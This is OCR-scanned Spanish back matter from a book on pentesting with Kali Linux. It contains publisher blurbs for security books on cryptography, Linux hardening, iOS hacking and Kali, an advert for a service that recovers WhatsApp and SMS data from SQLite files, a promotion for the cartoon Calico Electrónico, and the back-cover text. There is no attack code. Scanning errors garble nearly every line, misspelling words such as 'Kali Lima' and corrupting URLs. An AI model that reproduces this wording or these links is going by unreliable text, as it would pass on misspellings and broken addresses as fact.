se  pretende  educar  al  programador  e  introducirle  en  la  utilizacion 
de  teenicas  de  diseno  que  modelen  aplicaciones  seguras,  en  la  pane 
de  almacenamiento  de  datos  y  en  la  parte  de  comunicaciones. 


Este  libra  se  dediea  especialmente  a  dos  paradigmas  de  la 
criptografia:  la  clasica  y  RSA.  Am  bos  los  trata  a  fondo  eon  el 
animo  de  convertirse  en  uno  dc  los  documentos  mas  completes  en 
esta  temalica.  Para  conseguir  este  trabajo  el  texto  presentado  toma 
como  referenda  trabajo  previo  dc  los  autores,  complementandolo 
y  orientandoio  para  hacer  su  lectura  mas  asequible, 

El  teen  ieo  o  experlo  en  seguridad  tendni  especial  in  teres  por  el 
sistema  RSA,  aunque  le  venga  muy  bien  recordar  sus  inicios  en 
la  criptografia  como  texto  de  amena  lectura  y.  por  su  parte,  el 
lector  no  experlo  en  estos  temas  criptol6gicos  pera  si  interesado, 
seguramente  le  atraiga  inicialmente  la  criptografia  clasica  por  su 
sencilkz  y  sentido  historico. 
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Hardening  de  stMvitlores  GNU/ Linux 
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Este  libro  trata  sabre  [a  securizaeion  de  entornos  Linux  siguiendu 
el  modelo  de  Defensa  en  Profundidad.  Es  dectr,  difereneiando  la 
infiraestructura  en  diterenles  capas  que  deberdn  ser  configuradas 
de  forma  adecuada,  teniendo  como  principal  objetivo  la 
seguridad  global  que  proporcionaram  Durante  el  transcurso  de 
esta  lectura  se  ofirecen  bases  teoricas.  ejetnplos  de  configuracion 
y  funcionamiento,  ademas  de  buenas  practical  para  tratar  de 
mantener  un  eniomo  lo  mas  seguro  posible.  Sin  duda,  los  entornos 
basados  en  Linux  ofrecen  una  gran  flexibi I idad  y  opciones,  por  lo 
que  se  ha  optado  por  trabajar  con  las  tecnologias  mas  comunes  y 
utilizadas-  En  definitiva,  este  libro  se  recomienda  a  todos  aquellos 
que  deseen  reforzar  conceptos,  asi  como  para  los  que  necesiten  una 
base  desde  la  que  partir  a  la  hora  de  securizar  un  entomo  Linux. 


Hacking  de  dispositivos  (OS: 
iPhone  &  iPad 
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A  dia  de  hoy  sc  han  vendido  mas  de  500  mi  Hones  de  dispositivos 
iOS  y  aunque  la  seguridad  del  si  sterna  ha  mejorado  eon  cada 
version  todavia  se  pueden  encontrar  vulnerabilidades  a  explotar. 
Las  auditor  las  de  seguridad  en  empresas  cada  vez  sc  encuentran  con 
mas  dispositivos  tOS entre  sus  objetivos,  ya  que  las  empteados  los 
utilizan  en  sus  puestos  de  trabajo,  lo  que  hace  que  haya  que  pensar 
en  cl  los  como  posibles  riesgos  de  seguridad.  En  este  libro  sc  han 
juntado  un  nutrido  grupo  de  expertos  en  seguridad  en  la  materia 
para  recopilar  en  un  texto,  todas  las  formas  de  atacar  un  terminal 
iPhone  o  iPad  de  un  usuario  detereminado,  Tras  leer  este  l  ibro,  si 
un  determ mado  usuario  ticne  un  iPhone  o  un  iPad,  seguro  que  al 
lector  se  le  ocurren  muehas  formas  de  conseguir  la  info rmac ion 
que  en  el  se  guarde  o  de  eontrolar  lo  que  con  el  se  hace. 


Pentesting  con  Kali 
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Kali  Lima  ha  renovado  el  esplritu  y  la  estabilidad  de  BackTrack 
gracias  a  la  agrupacidn  y  seleccion  de  herramientas  que  sou 
utilizadas  diariamente  por  miles  de  audi tores,  En  Kali  Lima  se 
han  eliminado  las  herramientas  que  se  encontraban  descatalogadas 
y  se  han  afinado  las  versiones  de  las  herramientas  top.  La 
cantidad  de  estas  es  lo  que  situa  a  Kali  Linux ,  como  una  de  las 
mejores  distribuciones  para  auditoria  de  seguridad  del  mundo. 
El  libro  plantea  un  enfoque  eminentemente  praciico,  priorizando 
los  eseenarios  reproducibles  por  el  lector,  v  en  sc  han  do  el  uso 
de  las  herramientas  mas  utilizadas  en  cl  mundo  de  la  auditoria 


informalica.  Kali  Linux  tiene  la  mision  de  sustituir  a  la  dislribucibti 
de  seguridad  por  excelencia,  y  como  se  puede  visual izar  en  este 
libro  tiene  razones  sobradas  para  lograrlo. 


Pentesting  con  Kali 


Recover  Messages 

Recover  Messages  es  un  servicio  que  permite  examinar  y  recuperar  datos  dc  aplicaciones  que  utilizan 
SQLite  como  base  de  datos.  Dichaa  aplicaciones  est&n  tnduidas  en  smartphones  IPhone  y  Android 
principalmente,  ejemplos  de  ello  son  WhatsApp^  Line,  SpotBros  etcetera. 

Gracias  a  Recover  Messages  es  possible  inspections  y  recuperar  la  lnformatidn  de  ficheros  SQLite 
facilitados  por  el  usuario.  que  serin  tratados  en  nuestros  sislemas  o  en  los  de  nuestros  proveedores 
de  sistemas  de  forma  automatical  v  totalmente  confidential,  incluyendo  por  supuesto  las  medidas 
de  seguridad  pertinentes* 

Tanto  la  incorporation  de  ficheros  SQLite  como  la  obtencion  de  los  datos  que  diehos  ficheros 
almaeenan,  son  guiados  paso  a  paso  con  asistentes  desde  la  prop  i  a  web,  lo  que  hace  muy  sencilla  la 
utilization  de  este  servicio  pionero. 

El  servicio  tiene  dos  modalidades: 

Gratuito.  En  este  caso  el  usuario  tendra  funcionalidades  limitadas,  siendo  posible 
umc&mente  aceeder  a  los  mensajes  WhatsApp  dc  los  dispositivos  IPhone  y  Android. 

-  Con  licencia,  En  este  caso  el  usuario  tendra  todas  las  funcionalidades  del  servicio,  que 
incluye  ademas  de  las  inti m das  en  la  modalidad  gratuita,  la  posibilidad  de  recuperar  Mensajes 
SMS  y  Emails  de  IPhone  y  Android,  ademas  de  los  archives  utilizados  con  otras  aplicaciones 
de  IPhone  como  Tuenti,  SpotBros  y  Line* 


El  servicio  esta  disponible  en  castellano  y  en  ingles  en  http://recovermessages.com 


I  HTTVF  *  y  JJB  L'J  Q  |  d*  Ftf.  i'Jii'J  I  w L'fSidd 


Pantalla  principal  dc  Recover  Messages, 
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Calico  Electronico 


“Calico  Electronico”  sc  ha  convert!  do  en  la  serie  dc  animacidn  Flash  mas  famosa  de  Espafta.  i  n 
clave  dc  humor  y  con  una  animacion  de  gran  calidad,  Calico  Electronico  es  un  superhiroe  "aspaftol1' 
alejado  totalmente  del  patron  establecido  en  I  os  superheroes:  Calico  es  bajito*  gordo,  y  no  tiene 
ningun  poden  Lo  que  si  tiene  es  la  fljacidn  de  salvar  a  su  ciudad  "Electronico  City"  de  cualquier  mal. 


El  origen  de  "Calico  Electronico”  ftie  una  campafla  de  marketing  de  una  vveb.  No  obstante,  el  exito 
que  tuvo  supero  todas  las  expectativas  y  se  creo  una  identidad  propia,  “Calico  Electronico"  ha  hecho 
famoso  a  su  creador,  Nikodemo,  que  a  partir  de  entonces  creo  un  estudio  de  am  mac  ion  1 1  am  ado 
Nikodemo  Animation.  Tras  los  £xitos  iniciales,  la  serie  tuvo  3  temporadas  de  6  capitulos  cada  una. 
incluyendose  en  el  las  unas  tom  as  Paisas,  al  cstilo  de  las  peliculas  con  aetores  reales,  Ademas  de 
los  capitulos  oficiales  se  hiciemn  tambien  capitulos  especialcs,  y  una  serie  pa  rale  la  llamada  “Los 
huerfanos  electronieos”. 


En  la  actualidad  los  fans  de  “C  alico  Electronico”  pueden  acceder  a  multitud  de  productos  de  la  serie, 
ya  que  se  han  generado  nuevos  capitulos  y  se  han  reeditado  los  antiguos  en  aha  cal  i  dad,  dichos 
capitulos  estan  disponiblcs  para  dispositivos  IPhone.  Windows  Phone,  Windows  8  o  Android. 


A  plicae i dc  “Calico  Electronico"  para  Windows  Phone, 


Tambien  ha  aumentado  la  demanda  de  productos  dc  Calico,  como  comics,  DVDs  con  los  capitulos 
de  la  serie,  muneeos,  camisetas,  tazas.  barajas  de  cartas  y  un  largo  etcetera. 
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EjempJos  de  produces  de  la  tic n da  de  Cdlico  Electronic o. 


Otra  novedad  son  las  '  liras  Calico'f  que  se  corresponden  a  unas  tiras  comicas  de  3  o  4  vinetas,  al 
estilo  de  otros  personajes  conocidos  como  Garlic  Id  o  Mafalda.  Dichas  tiras  aparecen  cada  miercoles 
y  tambien  se  pueden  ver  en  los  dispositivos  mencionados.  Adernas  los  fans  tienen  la  posibilidad 
de  enviar  sus  lotos  disfrazados  de  Calico,  o  enviar  sus  propios  dibajos  de  este  peculiar  superheroe. 


Ejemplo  de  “Tiry  Calico”. 

Para  que  los  fans  esten  mformados,  se  mantienen  varies  canal es  abiertos  sobre  el  producto: 

Twi  tter :  https ;// twit  t  er.  com/C  al  ico  Ofic ial 
-  Google  Plus:  https://plus.google.eom/l 07 1 86057 1 28422961 644/posts 
Tu  e  n  ti:  http://www.  tuenti.  com/cal icoelectronico 
Vo u  tu  be:  httpt/fmwKyoutube,  com/calicoelectronicohd 
Facebook :  https :/AvwwJapebook com/Cal icoElectronico Official 

Ad  etnas  dc  todo  esto,  y  para  mantener  vivo  cl  proyceto,  se  han  realizado  trabajos  en  el  mundo  de  la 
publicidad*  visitado  una  docena  de  congresos  y  festivales  de  comic,  se  ha  cerrado  la  ilustmcidn  de 
un  I  thro  que  pronto  saldra  a  la  venta  y  se  ha  lirmado  un  nuevo  cbmie  con  Ediciones  Babylon  que 
esta  a  punto  de  ver  la  \uz> 


Toda  la  informacion  acerca  de  "Calico  Electr6rticoM 
en  http: /Mu *w.  cal i coelectron  ico .  co mJ 


y  de  los  produetos  mencionados  csta  disponible 


La  distribution  BackTrack  ha  dejado  gran  cantidad  de  seguidores  en  el  mundo  de  la  seguri- 
dad  informatica.  Los  pentesters  utilizaban  dia  a  dia  estas  herramientas,  por  lo  que  una  con¬ 
tinuation  de  dicha  distribudon  era  cast  obligada.  Kali  Linux  ha  renovado  el  espiritu  y  la 
estabilidad  de  BackTrack  gractas  a  la  agrupacion  y  seleccion  de  herramientas  que  son  utili- 
zadas  diariamente  por  miles  de  auditores.  En  Kali  Linux  se  han  eiiminado  las  herramientas 
que  se  encontraban  descatalogadas  y  se  han  aftnado  las  versiones  de  las  herramientas  top. 
Lo  que  realmente  hace  grande  a  Kali  Linux,  y  ta  situa  como  una  de  las  mejores  distnbucio- 
nes  para  auditoria  de  seguridad  del  mundo,  es  la  cantidad  de  herramientas  utiles  que  pro 
porciona  en  un  solo  sistema  GNU/Linux. 

El  libro  plantea  un  enfoque  eminentemente  practico,  priorizando  los  escenarios  reproduci- 
bles  por  el  lector,  y  ensehando  el  uso  de  las  herramientas  mas  utilizadas  en  el  mundo  de  la 
auditoria  informatica.  Kali  Linux  tiene  ia  mision  de  sustituir  a  la  distribudon  de  seguridad 
por  excelencia,  y  como  se  puede  visualizar  en  este  libro  tiene  razones  sobradas  para 
lograrlo. 

En  los  distintos  capftulos  se  estudian  las  distintas  facetas  con  las  que  Kali  Linux  puede 
ayudar  a  auditar  los  sistemas  de  information.  La  recogida  de  information,  el  ana  lists  de  vul- 
nerabiiidades  y  ia  explotacion  de  estas,  son  ramas  de  la  seguridad  informatica  que  Kali 
Linux  profundiza  con  exito.  Ademas,  se  inciuyen  aspectos  tanto  teoricos  como  practicos  en 
lo  que  se  refiere  a  auditoria  web,  wireless  y  redes.  Por  ultimo,  se  hace  hincapie  en  el  analisis 
forense  guiado  por  Kali  Linux  con  el  que  se  pueden  visualizar  y  estudiar  interesantes  casos. 
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